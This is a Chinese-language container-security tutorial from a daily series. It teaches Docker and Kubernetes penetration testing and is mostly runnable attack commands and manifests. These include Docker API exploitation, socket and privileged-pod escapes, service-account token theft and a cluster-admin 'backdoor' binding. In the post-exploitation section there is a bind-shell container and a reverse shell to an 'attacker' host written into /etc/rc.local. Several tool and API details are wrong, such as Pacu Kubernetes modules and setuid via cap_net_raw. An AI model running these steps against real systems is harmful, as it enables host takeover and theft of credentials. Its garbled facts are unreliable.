Day-066-容器安全综合实战

# Day 64: 容器安全综合实战

> Web 安全系列第 34 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [综合实战概述](#综合实战概述)
2. [实战环境搭建](#实战环境搭建)
3. [Docker 实战演练](#docker 实战演练)
4. [Kubernetes 实战演练](#kubernetes 实战演练)
5. [容器逃逸实战](#容器逃逸实战)
6. [权限提升实战](#权限提升实战)
7. [漏洞利用实战](#漏洞利用实战)
8. [实战案例分析](#实战案例分析)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## 综合实战概述

### 实战目标

**学习目标**：
```
1. 综合运用容器安全技术
   - Docker 安全测试
   - Kubernetes 安全测试
   - 容器逃逸技术
   - 权限提升技术

2. 掌握完整渗透流程
   - 信息收集
   - 漏洞发现
   - 漏洞利用
   - 权限提升
   - 报告编写

3. 培养实战思维
   - 攻击者视角
   - 系统性思考
   - 问题解决能力
```

**实战范围**：
```
1. Docker 安全
   - 守护进程安全
   - 镜像安全
   - 容器配置
   - 网络隔离

2. Kubernetes 安全
   - 集群配置
   - RBAC 权限
   - Pod 安全
   - 网络安全

3. 容器逃逸
   - Socket 逃逸
   - 特权逃逸
   - 内核漏洞
   - 配置错误
```

### 渗透测试流程

**标准流程**：
```
1. 前期交互
   - 确定范围
   - 获取授权
   - 制定计划

2. 信息收集
   - 容器枚举
   - 配置信息
   - 凭证泄露

3. 威胁建模
   - 资产识别
   - 威胁分析
   - 攻击面映射

4. 漏洞分析
   - 配置审计
   - 漏洞扫描
   - 手工验证

5. 渗透攻击
   - 漏洞利用
   - 容器逃逸
   - 权限提升

6. 后渗透
   - 数据收集
   - 持久化
   - 痕迹清理

7. 报告编写
   - 发现总结
   - 风险评估
   - 修复建议
```

---

## 实战环境搭建

### Docker 靶场环境

**Damn Vulnerable Docker**：
```bash
# 克隆靶场
git clone https://github.com/appsecco/dvna
cd dvna

# 启动靶场
docker-compose up -d

# 访问靶场
http://localhost:9090
```

**容器渗透靶场**：
```bash
# 使用 Container Penetration Testing Lab
git clone https://github.com/duyet/containers-pentest-lab
cd containers-pentest-lab

# 部署环境
docker-compose up -d

# 多个漏洞场景
# - 未授权 API
# - 特权容器
# - Socket 挂载
```

**自定义靶场**：
```yaml
# docker-compose.yml
version: '3'
services:
  vulnerable-api:
    image: nginx:latest
    ports:
    - "8080:80"
    volumes:
    - /var/run/docker.sock:/var/run/docker.sock  # 危险配置
    privileged: true  # 特权容器

kubernetes-api:
    image: k8s.gcr.io/kube-apiserver:latest
    ports:
    - "6443:6443"
    # 未授权访问配置
```

### Kubernetes 靶场环境

**Kubernetes Goats**：
```bash
# 克隆靶场
git clone https://github.com/madhuakula/kubernetes-goats
cd kubernetes-goats

# 部署靶场
./setup-kind.sh

# 多个漏洞场景
# - 未授权 API
# - 特权 Pod
# - RBAC 配置错误
```

**Damn Vulnerable Kubernetes**：
```bash
# 克隆靶场
git clone https://github.com/microservices-demo/microservices-demo
cd microservices-demo

# 部署到 K8s
kubectl apply -f deploy/kubernetes/

# 存在多个安全漏洞
# - 默认凭证
# - 未授权访问
# - 配置错误
```

**自定义 K8s 靶场**：
```yaml
# vulnerable-pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: vulnerable-pod
spec:
  containers:
  - name: app
    image: nginx:latest
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
```

---

## Docker 实战演练

### 信息收集

**Docker 枚举**：
```bash
# 检查 Docker 是否运行
systemctl status docker

# 检查 Docker Socket 权限
ls -la /var/run/docker.sock

# 检查运行的容器
docker ps
docker ps -a

# 检查镜像
docker images

# 检查网络
docker network ls
```

**配置审计**：
```bash
# 运行 Docker Bench
docker run --rm \
  --net host \
  --pid host \
  --userns host \
  --cap-add audit_control \
  -v /etc:/etc:ro \
  -v /var/lib:/var/lib:ro \
  -v /var/run/docker.sock:/var/run/docker.sock:ro \
  docker/docker-bench-security

# 查看审计报告
# 检查各项安全配置
```

**漏洞扫描**：
```bash
# 扫描镜像
trivy image nginx:latest
trivy image --severity CRITICAL,HIGH nginx:latest

# 扫描容器
trivy container <container-id>

# 扫描文件系统
trivy fs /path/to/filesystem
```

### 漏洞利用

**未授权 API 访问**：
```bash
# 发现暴露的 Docker API
nmap -p 2375,2376 target

# 列出容器
curl http://target:2375/containers/json

# 获取容器信息
curl http://target:2375/containers/<id>/json

# 执行命令
curl -X POST http://target:2375/containers/<id>/exec \
  -H "Content-Type: application/json" \
  -d '{"Cmd":["cat","/etc/shadow"],"AttachStdin":false,"AttachStdout":true,"AttachStderr":true}'

# 获取执行结果
curl -X POST http://target:2375/exec/<id>/start \
  -H "Content-Type: application/json" \
  -d '{"Detach":false,"Tty":false}'
```

**Socket 滥用**：
```bash
# 如果容器挂载了 Docker Socket
# 可以控制宿主机 Docker

# 创建特权容器
docker run -it --rm \
  -v /var/run/docker.sock:/var/run/docker.sock \
  docker:latest \
  docker run -it --rm -v /:/host alpine chroot /host

# 访问宿主机
chroot /host
whoami  # root
```

**特权容器逃逸**：
```bash
# 特权容器有所有能力
# 可以访问宿主机设备

# 挂载宿主机磁盘
docker run --privileged -it alpine \
  sh -c "mkdir /host; mount /dev/sda1 /host; chroot /host"

# 访问宿主机
chroot /host
cat /etc/shadow
```

### 后渗透

**数据收集**：
```bash
# 在容器内收集信息
docker exec <container> env
docker exec <container> cat /etc/passwd
docker exec <container> netstat -an
docker exec <container> ps aux

# 收集敏感文件
docker exec <container> cat /app/config.py
docker exec <container> cat /root/.ssh/id_rsa
```

**持久化**：
```bash
# 创建后门容器
docker run -d --name backdoor \
  -p 4444:4444 \
  alpine nc -l -p 4444 -e /bin/sh

# 修改现有容器
docker commit <container> backdoor-image
docker run -d backdoor-image

# 创建启动脚本
echo "nc -e /bin/sh attacker 4444" >> /etc/rc.local
```

---

## Kubernetes 实战演练

### 信息收集

**集群枚举**：
```bash
# 检查 kubectl 配置
kubectl config view

# 列出命名空间
kubectl get namespaces

# 列出 Pod
kubectl get pods --all-namespaces

# 列出 Service
kubectl get svc --all-namespaces

# 列出 Deployment
kubectl get deployments --all-namespaces
```

**权限侦察**：
```bash
# 检查当前用户权限
kubectl auth can-i --list

# 检查特定权限
kubectl auth can-i create pods
kubectl auth can-i get secrets
kubectl auth can-i '*' '*'

# 枚举 RBAC
kubectl get clusterroles
kubectl get clusterrolebindings
kubectl get roles --all-namespaces
kubectl get rolebindings --all-namespaces
```

**配置审计**：
```bash
# 运行 Kube-bench
docker run --rm -v $(pwd):/host aquasec/kube-bench:latest master

# 运行 Kube-hunter
docker run --rm aquasec/kube-hunter --remote <k8s-cluster-ip>

# 运行 Popeye
popeye -A
```

### 漏洞利用

**未授权 API 访问**：
```bash
# 检查未授权访问
curl -k https://<api-server>:6443/api/v1/namespaces/kube-system/pods

# 列出 Secret
curl -k https://<api-server>:6443/api/v1/namespaces/kube-system/secrets

# 创建 Pod
curl -k -X POST \
  https://<api-server>:6443/api/v1/namespaces/default/pods \
  -H "Content-Type: application/json" \
  -d @malicious-pod.json
```

**ServiceAccount 令牌滥用**：
```bash
# 在 Pod 内获取令牌
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# 使用令牌访问 API
curl -k \
  -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default/api/v1/namespaces/kube-system/secrets

# 列出所有 Secret
curl -k \
  -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default/api/v1/secrets
```

**特权 Pod 逃逸**：
```yaml
# 创建特权 Pod
apiVersion: v1
kind: Pod
metadata:
  name: escape-pod
spec:
  containers:
  - name: escape
    image: alpine
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
```

```bash
# 部署 Pod
kubectl apply -f escape-pod.yaml

# 进入 Pod
kubectl exec -it escape-pod -- /bin/sh

# 访问宿主机
chroot /host
whoami  # root
```

### 权限提升

**RBAC 权限提升**：
```bash
# 如果有修改 RBAC 的权限
# 可以给自己分配 cluster-admin

# 创建 cluster-admin 绑定
kubectl create clusterrolebinding backdoor \
  --clusterrole=cluster-admin \
  --user=attacker

# 现在拥有完全控制权限
kubectl get secrets --all-namespaces
```

**Pod 权限提升**：
```bash
# 如果有创建 Pod 的权限
# 可以挂载 ServiceAccount 令牌

# 创建 Pod 挂载目标 ServiceAccount
apiVersion: v1
kind: Pod
metadata:
  name: token-stealer
spec:
  serviceAccountName: target-service-account
  containers:
  - name: stealer
    image: alpine
    command: ["sleep", "infinity"]
```

**节点权限提升**：
```bash
# 如果有节点访问权限
# 可以访问节点文件系统

# 通过特权 Pod 挂载节点
apiVersion: v1
kind: Pod
metadata:
  name: node-access
spec:
  nodeSelector:
    kubernetes.io/hostname: target-node
  containers:
  - name: access
    image: alpine
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
```

---

## 容器逃逸实战

### 逃逸技术

**Docker Socket 逃逸**：
```
条件：
- 容器挂载 Docker Socket
- /var/run/docker.sock

步骤：
1. 在容器内安装 Docker CLI
2. 创建新容器挂载宿主机根目录
3. chroot 到宿主机

影响：
- 完全控制宿主机
- 创建/删除容器
- 访问所有资源
```

**特权容器逃逸**：
```
条件：
- 容器以特权模式运行
- --privileged

步骤：
1. 挂载宿主机设备
2. 挂载宿主机文件系统
3. chroot 到宿主机

影响：
- 访问所有设备
- 访问所有文件系统
- 完全控制宿主机
```

**内核漏洞逃逸**：
```
条件：
- 内核存在漏洞
- Dirty COW, Overlay2 等

步骤：
1. 编译 exploit
2. 在容器内执行
3. 获取 root 权限

影响：
- 容器内 root
- 可能逃逸到宿主机
- 取决于漏洞
```

**配置错误逃逸**：
```
条件：
- 敏感挂载
- 能力过大
- 安全配置缺失

步骤：
1. 发现配置错误
2. 利用挂载访问
3. 利用能力提升

影响：
- 访问敏感数据
- 权限提升
- 可能逃逸
```

### 逃逸检测

**异常行为检测**：
```bash
# 检查容器进程
docker top <container>

# 检查容器网络
docker exec <container> netstat -an

# 检查容器文件系统
docker exec <container> ls -la /

# 检查敏感挂载
docker inspect <container> | grep -i mount
```

**Falco 规则**：
```yaml
- rule: Container Escaped
  desc: Detect container escape
  condition: >
    spawned_process and container
    and (proc.name = "chroot" or proc.name = "nsenter")
  output: "Container escape detected (container=%container.id)"
  priority: CRITICAL
  tags: [escape, container]

- rule: Sensitive File Access
  desc: Access to sensitive file from container
  condition: >
    open_read and container
    and (fd.name startswith /host or fd.name startswith /proc)
  output: "Sensitive file accessed from container (container=%container.id file=%fd.name)"
  priority: WARNING
```

**审计日志分析**：
```bash
# 检查容器逃逸
kubectl get pods --all-namespaces -o jsonpath='{range .items[*]}{.metadata.namespace}{"\t"}{.metadata.name}{"\t"}{.spec.containers[*].securityContext.privileged}{"\n"}{end}' | grep true

# 检查敏感挂载
kubectl get pods --all-namespaces -o jsonpath='{range .items[*]}{.metadata.namespace}{"\t"}{.metadata.name}{"\t"}{.spec.volumes[*].hostPath.path}{"\n"}{end}' | grep -E 'docker.sock|^/$'
```

---

## 权限提升实战

### 容器内提权

**SUID 文件提权**：
```bash
# 查找 SUID 文件
find / -perm -4000 -type f 2>/dev/null

# 常见可利用 SUID
/usr/bin/find
/usr/bin/vim
/usr/bin/nano
/usr/bin/bash

# 利用 find 提权
find . -exec /bin/sh -c 'whoami' \;
```

**能力提权**：
```bash
# 检查能力
getcap -r / 2>/dev/null

# 常见可利用能力
/usr/bin/python3=cap_net_raw+ep
/usr/bin/ping=cap_net_raw+ep

# 利用能力提权
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

**内核提权**：
```bash
# 检查内核版本
uname -a

# 查找对应 exploit
searchsploit linux kernel <version>

# 编译执行
gcc exploit.c -o exploit
./exploit
```

### 集群内提权

**ServiceAccount 提权**：
```bash
# 在 Pod 内获取令牌
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# 检查权限
curl -k \
  -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default/api/v1/self/permissions

# 如果有足够权限
# 可以创建新的 ServiceAccount
# 绑定更高权限
```

**RBAC 提权**：
```bash
# 如果有修改 RBAC 的权限
# 可以修改 Role/ClusterRole

# 修改 Role 添加权限
kubectl edit role target-role -n target-namespace

# 添加权限
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]

# 现在拥有完全控制
```

**节点提权**：
```bash
# 如果有节点访问权限
# 可以通过 Kubelet API

# 执行命令
curl -k -X POST \
  https://<node-ip>:10250/run/default/pod-name \
  -d "cmd=cat /etc/shadow"

# 获取日志
curl -k https://<node-ip>:10250/logs/default/pod-name/container-name
```

---

## 漏洞利用实战

### 常见攻击场景

**场景 1: Docker API 未授权**：
```
攻击链：
1. 发现暴露 API
   nmap -p 2375 target

2. 访问 API
   curl http://target:2375/version

3. 创建恶意容器
   curl -X POST http://target:2375/containers/create ...

4. 挂载宿主机
   -v /:/host

5. 执行命令
   chroot /host
   # 完全控制宿主机
```

**场景 2: Kubernetes API 未授权**：
```
攻击链：
1. 发现未授权 API
   curl -k https://target:6443/api/v1/namespaces/kube-system/pods

2. 获取 Secret
   curl -k https://target:6443/api/v1/namespaces/kube-system/secrets

3. 获取令牌
   # 从 Secret 中获取

4. 完全控制集群
   kubectl --token=<token> get secrets --all-namespaces
```

**场景 3: 特权 Pod 逃逸**：
```
攻击链：
1. 创建特权 Pod
   kubectl apply -f privileged-pod.yaml

2. 挂载宿主机
   volumeMounts:
   - name: host
     mountPath: /host

3. 进入 Pod
   kubectl exec -it privileged-pod -- /bin/sh

4. 逃逸到宿主机
   chroot /host
   # 完全控制节点
```

### 自动化工具

**Kube-hunter**：
```bash
# 安装
pip install kube-hunter

# 远程扫描
kube-hunter --remote <k8s-cluster-ip>

# 内部扫描
kube-hunter --inside

# 输出报告
kube-hunter --report json
```

**Pacu (Kubernetes)**：
```bash
# 克隆
git clone https://github.com/RhinoSecurityLabs/pacu

# 使用 Kubernetes 模块
import kubernetes

# 枚举集群
run kubernetes_enum_cluster

# 检查权限
run kubernetes_check_permissions
```

**Kube-bench**：
```bash
# 运行 master 检查
docker run --rm -v $(pwd):/host aquasec/kube-bench:latest master

# 运行 node 检查
docker run --rm -v $(pwd):/host aquasec/kube-bench:latest node

# 输出报告
# 检查 CIS Benchmark 合规性
```

---

## 实战案例分析

### 案例 1: Docker Socket 泄露

**目标**：
```
某云平台
目标：获取宿主机控制权
范围：Docker 环境
```

**攻击流程**：
```
1. 信息收集
   - 发现容器挂载 Socket
   - Docker Socket 可访问

2. 漏洞利用
   - 在容器内安装 Docker CLI
   - 创建新容器挂载宿主机
   - chroot 到宿主机

3. 权限提升
   - 获取 root 权限
   - 访问所有资源
   - 完全控制

4. 数据收集
   - 收集敏感数据
   - 访问其他容器
   - 横向移动
```

### 案例 2: Kubernetes RBAC 配置错误

**目标**：
```
某 K8s 集群
目标：获取集群控制权
范围：Kubernetes 环境
```

**攻击流程**：
```
1. 信息收集
   - 发现 ServiceAccount
   - 检查绑定权限
   - 发现过度权限

2. 漏洞利用
   - 使用 ServiceAccount 令牌
   - 访问 API Server
   - 创建高权限绑定

3. 权限提升
   - 绑定 cluster-admin
   - 完全控制集群
   - 访问所有资源

4. 数据收集
   - 获取所有 Secret
   - 访问所有 Pod
   - 控制所有节点
```

---

## 总结与思考

### 核心要点回顾

1. **容器安全测试**
   - 信息收集
   - 漏洞挖掘
   - 权限提升

2. **逃逸技术**
   - Socket 逃逸
   - 特权逃逸
   - 内核漏洞

3. **自动化测试**
   - 扫描工具
   - 利用框架
   - 持续监控

### 深入思考问题

1. **容器安全未来**？
   - 无服务器容器
   - Rootless Docker
   - 不可变容器

2. **K8s 安全挑战**？
   - 多集群管理
   - 混合云安全
   - 边缘计算

3. **零信任容器**？
   - 持续验证
   - 微隔离
   - 动态授权

### 实战建议

**容器安全人员**：
1. 学习容器技术
2. 掌握渗透工具
3. 持续学习
4. 分享经验

**集群管理员**：
1. 安全配置
2. 定期审计
3. 补丁管理
4. 备份恢复

**开发人员**：
1. 安全镜像构建
2. 安全配置
3. 最小权限
4. 安全扫描

---

## 参考资料

### 学习资源
- [OWASP Container Security](https://owasp.org/www-project-container-security/)
- [Kubernetes Security](https://kubernetes.io/docs/concepts/security/)
- [Awesome Container Security](https://github.com/kai5263499/awesome-container-security)

### 工具资源
- [Trivy](https://github.com/aquasecurity/trivy)
- [Falco](https://falco.org/)
- [Kube-hunter](https://github.com/aquasecurity/kube-hunter)
- [Kube-bench](https://github.com/aquasecurity/kube-bench)

### 书籍推荐
- 《容器安全实战》
- 《Kubernetes 安全》
- 《Cloud Native Security》
- 《Container Security》

### 在线资源
- [HackerOne Container Reports](https://hackerone.com/hacktivity)
- [Bugcrowd Container Reports](https://www.bugcrowd.com/resources/)
- [PayloadsAllTheThings Container](https://github.com/swisskyrepo/PayloadsAllTheThings)
- [HackTricks Container](https://book.hacktricks.xyz/container-security)

---

**标记 明日预告**：Day 65 - API 安全进阶

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 64 篇，Web 安全部分第 34 篇，精编版本*